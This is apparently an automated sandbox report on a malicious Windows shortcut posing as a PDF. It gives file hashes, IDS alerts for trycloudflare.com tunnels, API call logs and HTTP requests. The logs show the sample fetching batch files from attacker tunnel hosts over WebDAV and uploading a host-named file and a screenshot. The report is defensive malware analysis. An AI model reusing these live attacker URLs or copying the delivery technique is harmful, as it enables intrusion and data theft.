popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

doc01585520250114102531.pdf.lnk

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential GIF Format AntiDebug Lnk Format PNG Format AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 16, 2025, 11:06 a.m. April 16, 2025, 11:08 a.m.
Size 2.7KB
Type MS Windows shortcut, Points to a file or directory, Has Working directory, Icon number=11, Archive, ctime=Sun Apr 13 12:44:06 2025, mtime=Sun Apr 13 12:29:50 2025, atime=Sun Apr 13 12:29:50 2025, length=101, window=hide
MD5 bfe2f106c5a937a00509f9ba9f6c916e
SHA256 5f0ff028fe981ee258397cb0a1bbefc065126d4bf5d7a80d5fe78720f1179d4e
CRC32 BEE5F515
ssdeep 48:8zWa5E8XdQBW0XuHFHxE8D7m22JWO6c22WRE8z:8zKIuuleuVCEfeK
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49173 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49173 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49173 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49197 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49199 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49183 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49183 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49183 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49192 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
UDP 192.168.56.102:51405 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49207 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
UDP 192.168.56.102:56630 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.102:49193 -> 217.6.220.73:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49181 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49181 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49181 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49220 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49220 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49220 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49224 -> 104.16.231.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49224 -> 104.16.231.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49224 -> 104.16.231.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49296 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49296 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49296 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49223 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.102:49223 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.102:49223 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49170
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49173
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49162
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49163
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49183
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49207
104.16.230.132:443 		None None None
TLSv1
192.168.56.102:49209
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49181
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49196
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49221
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49220
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49222
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49250
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49224
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49296
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49223
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49259
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.102:49290
104.16.231.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: supported. Defaulting to Windows directory.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Windows>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: supported. Defaulting to Windows directory.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: Watchdog is active...
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The filename, directory name, or volume label syntax is incorrect.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: '\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\32' CMD.EXE was started with the above path as the current directory. UNC paths are not
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: supported. Defaulting to Windows directory.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: U: was deleted successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000f
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605e08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605e08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605e08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006058c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605fc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605b88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605c48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00605c48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0060de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006690a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006690a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006690a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006692a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET https://achievements-plates-station-gaming.trycloudflare.com/tra.bat
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/DavWWWRoo
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/32
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request GET https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request GET https://divide-snow-pound-clip.trycloudflare.com/b.txt
request LOCK https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request GET https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request UNLOCK https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request LOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request GET https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request UNLOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPFIND https://divide-snow-pound-clip.trycloudflare.com/
request HEAD https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PUT https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request HEAD https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPPATCH https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PUT https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request PROPFIND https://divide-snow-pound-clip.trycloudflare.com/error_log.txt
request PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/update.bat
request PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d52000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72bd3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d52000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71cd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71cd2000
process_handle: 0xffffffff
1 0 0

